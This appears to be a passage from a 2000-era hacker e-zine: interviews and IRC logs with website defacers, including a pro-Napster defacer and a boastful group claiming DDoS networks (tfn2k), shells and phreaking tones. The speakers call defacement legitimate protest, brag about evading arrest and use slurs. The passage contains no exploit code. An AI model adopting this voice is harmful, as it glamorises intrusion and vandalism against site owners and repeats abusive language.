      >4. Were you expecting the amount of media coverage that your getting?
      
      Ha ha. No. It's come as a complete surprise. However, That means that I 
      just have to be careful what subjects I choose to speak about - if I target 
      the message to the media and hence the people, it could help the causes 
      that I believe in. In this case, the governments stance on petrol tax and 
      the protestors associated with it.
      
      >5. Do you think having that media coverage is helping your "cause"?
      
      It's hard to be objective about it. At the very least,
      
      I have seen only one negative story about my defacements (although of 
      course here may be more). Also, I've had such an incredible response from
      the public - not just geeks and hackers - that I believe the media 
      coverage has indeed helped.
      
      >6. Do you feel that too many people deface for wrong/dumb reasons?
      
      Definately. Most people (read: kids) deface for no other reason than to 
      spread their name across any site they can. The pick irrelevant sites, post 
      badly spelled pages, use abusive and offensive language and generally get 
      on my tits. Why? Because of the few that actually have a talent and understand 
      the principles behind system hacking/cracking, the majority seem to waste 
      their hard-earned skills on "3l33t h4x0r sp34k" and sending "fuck-yous" 
      to people that "d1sr3sp3t th3!r 5h!t". Bah. Tossers. They could use their 
      skills to protest about things they believe in, using what I believe is 
      a legitimate form of protest. Of course, there are a few exceptions to this 
      rule; G-Force Pakistan for one - they are against the violence and murder 
      in Kashmir and deserve more publicity than I, for their cause is to awaken 
      the world to pain, torture, rape, murder and suffering that is being ignored 
      by the western world.
      
      >7. How do you feel your defacements are different?
      
      For the most part, they are well thought-out and have a definate purpose. 
      I also try to ensure correct spelling and good grammar. Most defacements 
      ignore these basic principles, giving the impression of stupidity on the 
      part of the cracker.
      
      >8. Do you have any role models in the "underground" community?
      
      I have no role models in any community. I respect some people (for example,
      Bruce Schneier, the L0pht and to a lesser extent, G-Force who lower their 
      image by using racist slurs), but certainly don't base my actions around 
      those of another. I would like to think I am original and different from 
      the mainstream.
      
      >9. Do you ever worry about getting arrested?
      
      Yes. I really don't fancy sharing a cell with a big homo called Bubba. I 
      take sensible precautions to avoid getting caught, although if law-enforcement 
      is determined to catch me they will. This is because contrary to popular 
      opinion, they are bigger, collectively smarter and have more resources than 
      I. I know that for every site I deface I increase my chances of getting 
      caught, and try to cover my tracks as much as possible. Sometime soon I 
      will have to stop for good, become a good grey-hat kinda guy and behave 
      myself, or I'm going to be facing a few years care of her Majesty the Queen.
      
      
      =====
      Old programmers never die. They just terminate and stay resident.
      
      http://phantasm.8m.com
      
      [END]
      
      @HWA      
      
      
323.0 [HWA] Interview with Pimpshiz in limelight recently by SugarKing
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is an interview with 'pimpshiz' who reportedly defaced over 60
      sites in a pro-napster social disobedience action. The cracker has 
      been in mainstream media and mentioned on HNN, SugarKing was able 
      to get this interview for your enlightenment and edification, 
      enjoy - Cruci.
      
      
      (c) 2000 by SugarKing/HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript. Thanks
      
      Cruciphux/HWA
      
      Mailto: media@hwa-security.net
      
      [ - Session Start - (EDITED SLIGHTLY) -]
      
      SugarKing: getting quite the media attention eh?
      Pimpshiz: why do you say that
      SugarKing: haha, don't you read HNN?
      Pimpshiz: no
      SugarKing: well you're on alot
      Pimpshiz: oh lol
      Pimpshiz: yeah but that intern talks shit
      Pimpshiz: pyle or whatever
      SugarKing: APB News did an article on you
      SugarKing: are you really an 11 year-old?
      Pimpshiz: no lol
      SugarKing: lol yeah I figured that
      SugarKing: you shouldn't of left your aol account on your defacements
      Pimpshiz: too late
      SugarKing: yep
      SugarKing: you're gonna get busted dude, heh
      SugarKing: by doing that
      Pimpshiz: maybe
      SugarKing: maybe if they don't wish to pursue you, but if they want to 
      they are gonna get you
      Pimpshiz: yeah
      SugarKing: i haven't seen you deface lately, all done?
      Pimpshiz: yeah, for the time being
      SugarKing: good idea
      Pimpshiz: hheheehe
      SugarKing: As if the pro-Napster defacements of random web sites weren't 
      silly enough already, there's a new twist in the case. The individual who 
      claims responsibility for the attacks (a.k.a. Pimpshiz -- now also claiming 
      to be an 11 year-old girl) warns officials that his/her/its arrest will lead 
      to revenge attacks by his/her/its buddies. If the threats have any truth to 
      them, they will only lead to more charges against the vandal. 
      SugarKing: heh
      SugarKing: http://www.apbnews.com/newscenter/breakingnews/2000/ 
      08/18/hacker0818_01.html
      SugarKing: there's one story on you
      Pimpshiz: i already read that
      Pimpshiz: got anymore?
      SugarKing: lemme look
      Pimpshiz: k
      SugarKing: http://dailynews.yahoo.com/h/zd/20000817/tc/napster_fan_ 
      hacks_dozens_of_sites_2.html
      Pimpshiz: got it
      Pimpshiz: same as the apbnews one isnt it
      SugarKing: not really
      SugarKing: they say similiar things, but different site and article
      Pimpshiz: any others?
      SugarKing: hmm no
      Pimpshiz: k
      Pimpshiz: someone found a CNN one on me yesterday
      SugarKing: oh
      Pimpshiz: pcworld, computerworld
      Pimpshiz: zdnet
      Pimpshiz: internet.com wants to interview me on their radio station 
      today
      SugarKing: and are you going to?
      Pimpshiz: not sure yet
      SugarKing: honestly, I wouldn't
      SugarKing: unless you plan on telling them your done defacing
      Pimpshiz: yeah, dunno cus what if they ask me somethin unexpected 
      that i cant answer
      SugarKing: yeah that too
      Pimpshiz: but then again
      Pimpshiz: it'd be just tite
      Pimpshiz: to give shouts at the end
      SugarKing: hahah, it's gonna be tight when your ass is caught by the FBI
      Pimpshiz: hehehe yeah
      Pimpshiz: ill be like "yo lemme get shouts to my boys in the west, 
      RSH, hackweiser, the FBI, the CIA, the NIPC"
      Pimpshiz: ;x
      SugarKing: haha
      SugarKing: i've never heard of you till this napster thing, your obviously 
      new to the scene
      Pimpshiz: what scene
      Pimpshiz: defacing scene?
      SugarKing: yeah
      Pimpshiz: lol
      Pimpshiz: yeah, but to everything else im from 95
      Pimpshiz: been programming since 96
      SugarKing: oh so you program?
      Pimpshiz: lol yes
      Pimpshiz: im certified professional in like 6 things
      SugarKing: so you're not just another NT kiddie?
      Pimpshiz: id show you my online transcript but it has my personal info
      Pimpshiz: and no
      Pimpshiz: lol
      Pimpshiz: i guess not
      SugarKing: 11 year-old girl, lol....so your not in your teens either I 
      imagine?
      Pimpshiz: im 16
      Pimpshiz: not 11 
      Pimpshiz: and im a guy
      SugarKing: hahah i figured that
      SugarKing: i don't think an 11 year-old girl can hack nasa
      Pimpshiz: hehehe
      SugarKing: He wrote in a series of e-mails to ZDNet News that hacking the 
      sites was easy and he was able to exploit "obvious" holes.
      SugarKing: what did you exploit anyways?
      Pimpshiz: hahaha that was a lie 
      Pimpshiz: i didnt write that shit
      SugarKing: haha
      Pimpshiz: thats hellllllllla funny
      Pimpshiz: cus it sure as fuck was not easy rofl
      SugarKing: i don't think it was a common hole anyways
      SugarKing: yeah i would figure that
      Pimpshiz: its undocumented 
      SugarKing: you find it yourself?
      SugarKing: the hole
      Pimpshiz: yeah
      SugarKing: cool
      SugarKing: The alleged hacktivist who may have defaced as many as 60 Web 
      sites in the past week with a Pro-Napster screed now warns that fellow 
      hackers will unleash widespread cyberattacks if federal authorities attempt 
      to collar any suspects. 
      SugarKing: lol you say that one?
      Pimpshiz: yeah
      Pimpshiz: but i didnt conspire it
      Pimpshiz: someone told me and i relayed it
      SugarKing: ah
      SugarKing: Ray Kaplan, a computer security consultant at Guardent Inc. in 
      St. Paul, Minn., said the defacements appear to be nothing new or original. 
      
      It's the same old penetration, he said. You figure out what software people 
      are running, and go find the exploit and take advantage of it. 
      
      SugarKing: lol
      Pimpshiz: lol yeah, even microsoft thinks im using the SQL default pw
      SugarKing: hah
      SugarKing: so when do you plan on clarifying all these things, own 
      exploit, not 11 year-old, etc
      Pimpshiz: dunno yet
      SugarKing666: http://www.hwa-security.net/index0.html mind if I clarify some of it on there? i won't if you don't want to
      Pimpshiz: yeah go ahead
      SugarKing: cool thanks
      SugarKing: what is service is your exploit for?
      Pimpshiz: cant say
      Pimpshiz: no details.
      
      END
      
      (c) 2000 SugarKing/HWA-Security
                  
      @HWA
      
324.0 [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      I know its a waste of space but it belongs here nontheless. They can get off in
      knowing their silliness made it into the zine as promised =)
      
      Prelude
      
      
      This "interview" was requested by members of DeC. It is one of the most
      elite I have ever done or seen, it surely makes groups like ADM look
      completely lame.
      
      
      Done Tuesday Aug 1st 2000. A date to remember indeed I refrained from
      adding commentary although it was tempting, I think the text speaks 
      for itself. Enjoy!
      
      
      ---START---
      
       Value of LOG set to ON
      <blame_> y0d00d
      <Cruciphux> you guys both DeC?
      <blame_> so what's up with this interview?
      <blame_> y4h
      <r00thl3ss> i WANT TO EXPLAIN MY MOTIVES for HACKING
      <Cruciphux> didnt say there was one yet
      <Cruciphux> :)
      000 mode/#intr [+o r00thl3ss] by blame_
      <blame_> AHYO
      <blame_> watchit with those smily facez
      <Cruciphux> but go ahead and make your statement
      <blame_> 0k
      <blame_> l1ke
      <Cruciphux> eat me
      <Cruciphux> heh
      <r00thl3ss> i hack not for knowledge but POWER
      <Cruciphux> ok
      <r00thl3ss> not to learn but to DESTROY
      <r00thl3ss> to CONTROl
      <r00thl3ss> CONTROL
      <blame_> i agree
      <Cruciphux> what have you hacked
      <blame_> d00d
      <Cruciphux> coz I never heard of you
      <r00thl3ss> what have I HACKED?
      <blame_> WHAT HAVENT WE HACKED
      <r00thl3ss> sti.amwe.qow.ei.pan.gov.au for ONE THING MISTER
      <Cruciphux> yeah you dont need to be specific
      <r00thl3ss> oh shyt
      <blame_> 0kd00d
      <Cruciphux> why the attitude?
      <Cruciphux> it makes you seem lame
      <blame_> why should poeple come forth about that they've hacked
      <Cruciphux> are you for real?
      <blame_> y4h
      <Cruciphux> well.
      <blame_> we're the real deal
      <r00thl3ss> remember when prohosting.com got rm'd a few years ago
      <Cruciphux> yeh
      <r00thl3ss> ?
      <Cruciphux> you guys?
      --------------- --  -
      | r00thl3ss (ruthless@???????.gti.net) (Internic Network)
       ircname  : blast blast & leave my gang rag layin on ur face
      | channels : @#intr 
       server   : irc.mcs.net (MCSNet Services - (312)803-MCS1)
      : idle     : 0 hours 0 mins 12 secs (signon: Tue Aug  1 14:35:30 2000)
      <blame_> th3thtth4t w4z y0!@
      --------------- --  -
      | blame_ (lurk@???????.gti.net) (Internic Network)
       ircname  : lock ur windowz, close ur doorz
      | channels : @#intr 
       server   : irc.idle.net (Phoenix Rising)
      : idle     : 0 hours 0 mins 5 secs (signon: Tue Aug  1 11:37:42 2000)
      <blame_> ermM
      <r00thl3ss> n0 c0mM3nt
      <blame_> 0h y4h
      <blame_> i m34n
      <Cruciphux> fair nuff heh
      <blame_> l1ke
      <Cruciphux> was it provoked?
      <blame_> 1t w4z s0m30ne elze
      <r00thl3ss> my lawyer has directed me 2 not say anything incrimin8ng
      <blame_> y3z
      <Cruciphux> so you said you wanted an interview what do you want to say?
      <blame_> w3 g0 w4y b4ck w1th th3 adm1n
      <Cruciphux> you're new...how new?
      <blame_> he was mad cuz we shut off his fonez acouple times
      <blame_> he started runn1ng hiz m0uth 0ff
      <blame_> 4nd u kn0w how things are
      <Cruciphux> why was he mad at ya?
      <blame_> p34ple wh0 p0p sh1t get rm'D
      <r00thl3ss> SHHH
      <r00thl3ss> !!!
      <Cruciphux> heh
      <blame_> i m34n
      <blame_> l1ke
      <blame_> y4h
      <blame_> f0rg3t th4t
      <r00thl3ss> yah el8 speak can not be used as evidence in court from what i understand anyway
      <Cruciphux> so how many people in this group?
      <Cruciphux> just you two?
      <r00thl3ss> so dont worry d00d!
      <blame_> 0h y4h
      <blame_> s0 anywayz
      <Cruciphux> i dont narq man
      <blame_> h0w ab0ut th4t intrv1ew d00d?
      <Cruciphux> thought we were attempting one now
      <Cruciphux> *g*
      <blame_> we're el8 and sh1t
      <r00thl3ss> yah we r
      <Cruciphux> how old are ya?
      <Cruciphux> how many members?
      <r00thl3ss> ill say
      <blame_> hell0?
      000 NetSplit: irc.etsmtl.ca split from irc.total.net [04:11pm]
       BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc.etsmtl.ca]
      <blame_> u there br0?
      <r00thl3ss> CrUCIpHix??
      <blame_> Cruciphux
      <Cruciphux> where you located? U.S?
      [ctcp(#intr)] PING
      <blame_> y0d00d
      <blame_> by not responding, you're disrespecting uz
      <blame_> and as u can see
      <blame_> th4t'z n0t wh4t u w4nn4b3 d01nG buDDY
      <Cruciphux> ib
      <Cruciphux> cable bloc sync dropped
      <Cruciphux> its shit
      <Cruciphux> actually dude
      <blame_> uHh 50 at the m0m3nt
      000 CTCP PING reply from r00thl3ss: 47.678 seconds
      <blame_> y3z all 0ver the w0rld
      <r00thl3ss> im also an op in one of the most PRESTEGIOUS UNDERGROUND IRC CHANNELS 
      <r00thl3ss> #phrack
      <r00thl3ss> !
      <Cruciphux> i've asked a bunch of questions and you guys didn't answer
      <Cruciphux> don't blame me the net is fux0red
      <Cruciphux> ok
      <blame_> y4h that t00
      <blame_> curr3ntly
      <Cruciphux> so answer the questions
      <Cruciphux> how long ya been around?
      [ctcp(#intr)] PING
      <blame_> we h4v3 m3mb3rz fr0m all 0ver the w0rld
      <blame_> each m3mber has their 0wn t4l3nt 
      <blame_> f0r ex4mpl3
      <Cruciphux> maybe we should reschedule this i keep dropping out
      <Cruciphux> unless you're packetting
      <Cruciphux> which i assume not
      [ctcp(#intr)] PING
      <blame_> r00thl3ss, can build a blueb0x like no oth3r
      <blame_> y0
      <blame_> do u kn0w whut a blueb0x iz?
      <r00thl3ss> ye$
      <blame_> cuz i c4n expl41n f0r the r34d3rz
      <blame_> hell0?
      <blame_> wh0a
      <Cruciphux> guys
      <Cruciphux> i keep dropping out
      <r00thl3ss> hahaha
      [ctcp(#intr)] PING
      <r00thl3ss> hes in #velcro
      <r00thl3ss> thats like the wannabe BoW chan
      <Cruciphux> i was invited
      <blame_> n0 it'z n0t
      <Cruciphux> no idea what its about
      000 CTCP PING reply from r00thl3ss: 139.547 seconds
      000 CTCP PING reply from r00thl3ss: 130.332 seconds
      <Cruciphux> ctcp ping replies are 130-139 seconds
      <Cruciphux> ..
      <Cruciphux> this is pointless
      IRC log ended Tue Aug  1 16:18:46 2000
       Starting logfile IrcLog
      IRC log started Tue Aug  1 16:19:33 2000
       Value of LOG set to ON
       Cruciphux [hwa@hwa-security.net] has joined #intr
       ServerMode/#intr [+nt] by irc.mcs.net
       [Users(#intr:1)] 
      [@Cruciphux ] 
       Channel #intr was created at Tue Aug  1 16:27:07 2000
       BitchX: Join to #intr was synced in 2.266 secs!!
       Cruciphux [hwa@hwa-security.net] has left #intr []
       Cruciphux [hwa@hwa-security.net] has joined #phrack
       [Users(#phrack:71)] 
      [ Cruciphux ] [ gweeds    ] [ cvx       ] [ suid      ] [ dnm       ] 
      [ TheHated  ] [ deb       ] [ hegemoOn  ] [ jennicide ] [ sl0ppy    ] 
      [ live_     ] [ cripto    ] [ _angus    ] [ MeGaMaCk  ] [ phatal    ] 
      [ r00thl3ss ] [ prym      ] [ sq-       ] [ xdm       ] [ Kore_Dump ] 
      [ py-       ] [ phidias   ] [ diphen    ] [ PRIAPUS   ] [ Yowie     ] 
      [ loki      ] [ _jerky    ] [ oghost    ] [ bnd       ] [ ajx       ] 
      [ _xyg_     ] [ blame_    ] [ SN        ] [ awr       ] [ kemo      ] 
      [ FrontLine ] [ kaotik    ] [ dank      ] [ plaguez   ] [ falken    ] 
      [ epic^     ] [ devstderr ] [ spinux    ] [ silitek   ] [ Sens      ] 
      [ eric      ] [ no_ana    ] [ rufus     ] [vpea       ] [ segmond   ] 
      [ cleb      ] [ sub       ] [ z3nz      ] [ dreck     ] [ ju1ce_    ] 
      [ deathinc_ ] [ suave     ] [ Neural    ] [ Trinity93 ] [ arch      ] 
      [ f_jail    ] [ Dodger    ] [ e10k      ] [ interline ] [ arakis_   ] 
      [ Swern     ] [ ju1ce-    ] [ incr      ] [ tyme      ] [ n00dle    ] 
      [ wilkins   ] 
       [Users(#phrack:21)] 
      [ Veerappan ] [ casret    ] [ chriz     ] [ kn0wfx    ] [ ret-      ] 
      [ pm-       ] [ ksoze     ] [ m4g1c     ] [ capnlunch ] [ sh1fty    ] 
      [ felix     ] [ _GNU_     ] [ Codiak    ] [ str8niga  ] [ ^2muchSun ] 
      [ codemonky ] [ maam0gr4m ] [ woyzeck   ] [ NNY       ] [ alia      ] 
      [ ii        ] 
       Channel #phrack was created at Thu Jul 13 15:49:35 2000
       BitchX: Join to #phrack was synced in 2.306 secs!!
      <Cruciphux> yo
      <Cruciphux> i'm lagged to fuck
      <incr> These next couple steps need to be done very rapidly. Open the grill lid, stick your head into the grill and light your lighter right next to your head. The result will be a very fast burning fireball that will burn all of the hair off of your head. 
      <Swern> they dotn call me butternuts jsut because i like to dip my balls in butter...
      <incr> this web page rules
      [msg(blame_)] go back to #intr for a sec
       Cruciphux [hwa@hwa-security.net] has left #phrack []
       Cruciphux [hwa@hwa-security.net] has joined #intr
       ServerMode/#intr [+nt] by irc.mcs.net
       [Users(#intr:1)] 
      [@Cruciphux ] 
       Channel #intr was created at Tue Aug  1 16:28:33 2000
       BitchX: Join to #intr was synced in 2.246 secs!!
       Topic (#intr): changed by Cruciphux: lagged to fuck lets reschedule
       blame_ [lurk@????????.gti.net] has joined #intr
       suave [g@?????ST.net] has joined #intr
      <suave> sup
      <blame_> y0d00dz
      <Cruciphux> i'm lagged to fuck
      <blame_> yo
      <Cruciphux> lets reschedule
      <blame_> i brought my bro suave
      <suave> sup blame
      <blame_> he's DEC
      <suave> word
      <blame_> not much dude
      <suave> DeC4life
      <blame_> w0rD
      <blame_> y0 so how about th1 interv13w y0?
      <blame_> erm th1z
      <Cruciphux> i'm lagged to fuck
      <Cruciphux> lets reschedule
      <Cruciphux> are you seeing this
      <blame_> hm look dude
      <blame_> yes
      <blame_> i'm kinda preessed for time
      <Cruciphux> wanna do email?
      <suave> get on another machine & do it bro
      <Cruciphux> cant
      <blame_> gimme a ime i'll see if i can fit it into m schedule
      <blame_> my
      <blame_> ok
      <suave> what kinda questions r u gonna ask
      <blame_> do u have a fone # i can reach u @?
      <Cruciphux> you give me a time if you're pressed 
      <Cruciphux> no
      <Cruciphux> email?
       r00thl3ss [ruthless@???????.gti.net] has joined #intr
      <blame_> naw i d0nt d0 em41l
      <r00thl3ss> y0
      <suave> sup r00thl3ss
      <blame_> yo d00D
      <r00thl3ss> whats the dealeo
      <Cruciphux> you have no anonymous email?
      <Cruciphux> i keep dropping out my cable is shit
      <r00thl3ss> email is not sekure!
      <blame_> uh ya
      <Cruciphux> i was getting ping times of 139 seconds
      <suave> ya not with carnivore around
      <suave> man did u hear aobut that shit
      <blame_> i refuse to use email, the government could be watching
      <r00thl3ss> yah
      <blame_> u n3v3r kn0w
      <r00thl3ss> i heard about it on the radio
      <Cruciphux> like they dont sniff efnet?
      <r00thl3ss> n.p.r.
      <Cruciphux> ha
      <Cruciphux> lets try this while i'm online
       [Users(#intr:4)] 
      [ r00thl3ss ] [ suave     ] [ blame_    ] [@Cruciphux ] 
      <blame_> 0k s0undz g00d
      --------------- --  -
      | r00thl3ss (ruthless@????????.gti.net) (Internic Network)
       ircname  : blast blast & leave my gang rag layin on ur face
      | channels : #intr 
       server   : irc.mcs.net (MCSNet Services - (312)803-MCS1)
      : idle     : 0 hours 0 mins 28 secs (signon: Tue Aug  1 14:35:30 2000)
      --------------- --  -
      | suave (g@?????ST.net) (Internic Network)
       ircname  : gangster of love
      | channels : #intr 
       server   : irc.idle.net (Phoenix Rising)
      : idle     : 0 hours 0 mins 44 secs (signon: Mon Jul 31 04:52:20 2000)
      <r00thl3ss> Ok question 1 is?
      --------------- --  -
      | blame_ (lurk@???????.gti.net) (Internic Network)
       ircname  : lock ur windowz, close ur doorz
      | channels : #intr 
       server   : irc.idle.net (Phoenix Rising)
      : idle     : 0 hours 0 mins 9 secs (signon: Tue Aug  1 11:37:42 2000)
      <Cruciphux> how long you guys been around?
      <suave> y0 1m r34dy
      <suave> $ho0t
      <blame_> 10 yearz n0w
      <r00thl3ss> 10 yrs next week
      <Cruciphux> and what does DeC stand for?
      <suave> ya i been around 10 years
      <r00thl3ss> digital
      <r00thl3ss> electronic
      <r00thl3ss> crips
      <suave> deadly electronic cripz
      <Cruciphux> how many members?
      <blame_> yah
      <r00thl3ss> deadly yah
      <r00thl3ss> over 50
      <Cruciphux> woah
      <r00thl3ss> at last count
      <blame_> we're like the digital version of the cripz and stuff
      <suave> like 5 th@ r inner circle tho
      <Cruciphux> thats bigger than most
      <blame_> i'm sure u've heard of the cripz before
      <suave> we have ties 2 the real crips
      <Cruciphux> what is your credo?
      <Cruciphux> yes
      <suave> & bloods 
      <Cruciphux> so you're ca?
      <suave> we pull shit 4 them on the net
      <Cruciphux> cc?
      <suave> some of us r
      <blame_> y4h
      <Cruciphux> but you hack too
      <suave> ya
      <Cruciphux> some defacing?
      <blame_> y4h $ure
      <blame_> naw
      <Cruciphux> so nothing on attrition
      <Cruciphux> ok
      <Cruciphux> what do you want to tell people
      <blame_> uh
      <blame_> well pr3tty much
      <blame_> that we're k00l3r th4n u
      <blame_> uhhhh
      <blame_> oh yah
      <Cruciphux> ...
      <blame_> and dont fuck with uz
      <Cruciphux> ok
      <blame_> or we'll rm u
      <blame_> suave
      <suave> we r in2 way more hardcore shit than defacing dude
      <suave> sup
      <blame_> do u have anything to add yo?
      <suave> ya back the fuck up b4 u get slapped the fuck up
      <r00thl3ss> ok back
      <suave> back the fuck up b4 u get hacked the fuck up
      <Cruciphux> well I don't know what to ask you guys to be honest if you're into shit you don't want to talk about its difficult to ask questions...
      <r00thl3ss> im in2 girls
      <Cruciphux> so you guys just talk away 
      <suave> me 2
      <Cruciphux> lol
      <suave> chicks say i look gr8 in blue
      <Cruciphux> you do shit offline?
      <blame_> $ure
      <Cruciphux> phreaking?
      <r00thl3ss> i look gr8 in all colours
      <blame_> yah phreak1ng
      <r00thl3ss> yah im a major field phreaker
      <blame_> we're bad ass
      <Cruciphux> own any switches?
      <r00thl3ss> no comment!
      <suave> u mean like beige boxing
      <Cruciphux> ha
      <suave> ya 4 sure
      <Cruciphux> beige boxing is fucking lame
      <r00thl3ss> switches what r those
      <blame_> r00thl3ss is pretty wiacked with a beige box
      <suave> i have a blotto box
      <blame_> erm wicked
      <Cruciphux> you're into phreaking and dunno what a switch is?
      <r00thl3ss> yah i am
      <Cruciphux> you're pulling my leg
      <blame_> those thingz are cool
      <Cruciphux> whats a dms 250
      <r00thl3ss> oh shiyt ok i remember now
      <r00thl3ss> hmm i dunno
      <r00thl3ss> w8
      <blame_> dms? wtf is that?
      <Cruciphux> whats a blue box?
      <suave> a dms 250 is a switch
      <Cruciphux> what does dropping a card mean?
      <suave> 4 phones & shit
      <r00thl3ss> a dms250 is a tandem switch?
      <Cruciphux> what tone seizes a trunk?
      <suave> blueboxes get u free calls
      <r00thl3ss> thats where u drop a CC on irc
      <blame_> 2stealk0d3z
      <r00thl3ss> 2600
      <suave> 2600hz
      <blame_> 2400+2600 under c5
      <suave> u can do it w/.a rice krispies whistle
      <blame_> 26000 under r1
      <blame_> erm 2600
      <r00thl3ss> only on switches not on the SS7 network!
      <Cruciphux> ala cap'n krunch right
      <suave> oh ya capn crunch been a while since i phreaked bro
      <r00thl3ss> crucphix u know 5ess?
      <Cruciphux> do you phreak for 'business' or fun
      <blame_> haha! crucphix iz lame!
      <Cruciphux> its cruciphux
      <suave> im really in2 unix cruciphix
      <r00thl3ss> fun & prophet!
      <Cruciphux> you're lame
       Cruciphux [hwa@hwa-security.net] has left #intr []
       BitchX: You are now talking to channel #hwa.hax0r.news
      >>> blame_ Invites You to #intr
       BitchX: Press Ctrl-K to join #intr
       Cruciphux [hwa@hwa-security.net] has joined #intr
       Topic (#intr): lagged to fuck lets reschedule
       Topic (#intr): set by Cruciphux at Tue Aug  1 16:28:55 2000
       [Users(#intr:4)] 
      [ Cruciphux ] [ r00thl3ss ] [ suave     ] [ blame_    ] 
       Channel #intr was created at Tue Aug  1 16:28:33 2000
       BitchX: Join to #intr was synced in 2.240 secs!!
      <Cruciphux> yo
      <suave> sup bro
      <r00thl3ss> y0 cruciphux
      <blame_> y0d00d
      <Cruciphux> you gonna be serious?
      <blame_> what's up 
      <blame_> sure
      <r00thl3ss> yah i was being serious dude
      <Cruciphux> or am i wasting my time
      <suave> ya
      <r00thl3ss> blme_ wasnt but hes a goofball
      <suave> im always serious
      <Cruciphux> so what are you into
      <Cruciphux> tell me the scoop man
      <suave> im in2 unix
      <r00thl3ss> blames a bong tokin alcoholic so forgive him
      <r00thl3ss> yah i know unix too
      <Cruciphux> DoSing?
      <r00thl3ss> the ins & outs
      <Cruciphux> or pure owning?
      <suave> im in2 net shit & sometimes i cruise the X.25 highway
      <r00thl3ss> nah i said unix not DOS
      <Cruciphux> how many shells you got
      <suave> depends how im feelin
      <suave> y u wanna trade
      <Cruciphux> DoS - denial of service
      <Cruciphux> no
      <r00thl3ss> oh u mean DoS
      <Cruciphux> i'm legit now
      <Cruciphux> yeh
      <suave> i got some virgin T3's that r eggable
      <suave> oic
      <r00thl3ss> i have tons of shells
      <blame_> pure owning
      <suave> thats kewl man every1 ends up legit u know
      <Cruciphux> do you have like a tfn net or shit
      <suave> once u reach that level of elitness and u just plateau
      <blame_> a tfn net?
      <Cruciphux> ok earlier i asked how old you are generally
      <blame_> we have many
      <Cruciphux> tribe flood network
      <r00thl3ss> im 29
      <suave> i have hundreds of t3's on my tfn
      <Cruciphux> its distributed denial of service 
      <suave> i use tfn2k tho bro
      <suave> its got more features
      <blame_> ohyah
      <Cruciphux> what about tfn3000
      <blame_> we at DeC are all about tfn2k
      <Cruciphux> heh
      <r00thl3ss> cruciphux are u in2 fones dude?
      <Cruciphux> used to be
      <r00thl3ss> u ever hack a switch?
      <Cruciphux> but i'm supposed to be interviewing you
      <r00thl3ss> ha sounds like a no 2 me
      <blame_> oh ok
      <blame_> well
      <blame_> u know MoD?
      <Cruciphux> if you're gonna act like dorks and not answer questions
      <r00thl3ss> im in MoD/LoD
      <Cruciphux> then what the fuck am I doing here?
      <r00thl3ss> so's blame & suave
      <blame_> yah
      <Cruciphux> this is incredibly lame
      <r00thl3ss> actually only im in LoD but we're all in MoD
      <r00thl3ss> uh y
      <Cruciphux> you seem to know shit
      <Cruciphux> you've told me nothing
      <Cruciphux> dont answer questions
      <blame_> whut do u wanna know?
      <Cruciphux> and want me to print this?
      <r00thl3ss> ask me something technical about switches!
      <Cruciphux> you're ops in #phrack?
      <blame_> just be like
      <r00thl3ss> yah of course we're ops in #phrack
      <Cruciphux> you said before you didnt know what a switch or dms was
      <Cruciphux> lol
      <Cruciphux> you said thats like beige boxing right
      <r00thl3ss> i was kidding
      <r00thl3ss> 2nd chance!
      <suave> cruciphux sup
      <Cruciphux> well tell me something
      <Cruciphux> heh
      <blame_> "DeC - super-underground, fuck with them & get rmd"
      <blame_> E0F
      <Cruciphux> thats it?
      <Cruciphux> ok
      <Cruciphux> i'll publish that
      <Cruciphux> any props?
      <suave> ok so lets talk about shells
      <suave> ya props 2 me & my crew (Dec)
      <blame_> yaaah uhhh
      <Cruciphux> ok disses?
      <Cruciphux> ;)
      <blame_> yah
      <r00thl3ss> PHRACK
      <blame_> everybody
      <suave> disses 2 phrack
      <blame_> gH
      <r00thl3ss> everybody especially PHRACK
      <Cruciphux> you guys do drugs?
      <blame_> phrack
      <blame_> HWA
      <suave> keelber elves
      <blame_> sSH
      <blame_> all those lam0rz
      <blame_> yah sure 
      <r00thl3ss> im str8 edge
      <suave> props 2 Rootshell Hackers from blame btw
      <r00thl3ss> yah disses to HWA 
      <suave> ya im sXe too
      <blame_> actually
      <Cruciphux> anything else?
      <blame_> scratch that propz to the rSH
      <r00thl3ss>         #     #
      <r00thl3ss>   ####   #   #   ######
      <r00thl3ss>  #        # #    #
      <r00thl3ss>   ####     #     #####
      <r00thl3ss>       #   # #    #
      <blame_> oh yah
      <blame_> be like
      <blame_> "HWA iz gay"
      <blame_> "DeC is gr8"
      <Cruciphux> ...
      <Cruciphux> that all?
      <r00thl3ss>  #    #  #   #   #
      <r00thl3ss>   ####  #     #  ######
      <r00thl3ss>  #    #  #    #    ##
      <r00thl3ss>  #    #  #    #   #  #
      <r00thl3ss>  ######  #    #  #    #
      <blame_> yah sure
      <Cruciphux> ok tnx
      <suave> crucipheux
      <suave> also
      <suave> make sure u mention this 
      <r00thl3ss>  #    #  # ## #  ######
      <r00thl3ss>  #    #  ##  ##  #    #
      <r00thl3ss>  #    #  #    #  #    #
      <r00thl3ss>     #     ####
      <r00thl3ss>     #    #
      <Cruciphux> this was quite the interview
      <suave> aempire is a fag
      <r00thl3ss>     #     ####
      <r00thl3ss>     #         #
      <r00thl3ss>     #    #    #
      <r00thl3ss>     #     ####
      <suave> man do ui have any more q's 4 me about shells or beige oxingh
      <suave> im willing 2 answer nething
      <r00thl3ss>   ####     ##     #   #
      <r00thl3ss>  #    #   #  #     # #
      <r00thl3ss>  #       #    #     #
      <r00thl3ss>  #  ###  ######     #
      <r00thl3ss>  #    #  #    #     #
      <Cruciphux> did you guys come from AOL originally?
      <Cruciphux> you like scrolling
      <r00thl3ss>   ####   #    #     #
      <r00thl3ss> haaha cruciSUX
      <r00thl3ss> disses to cruciphux
      <r00thl3ss> yah quiz us
      <r00thl3ss> i did!
      <suave> lol aol is for lamers
      <Cruciphux> so is scrolling
      <r00thl3ss> oh shyT misfire
      <r00thl3ss> i didnt really! 
      <blame_> aol is all lamers dude
      <Cruciphux> lol
      <suave> i got kicked off aol for aolhell
      <r00thl3ss> GAY-OL HAhA
      <Cruciphux> k tnx for nothin
      <r00thl3ss> me 2 dude!
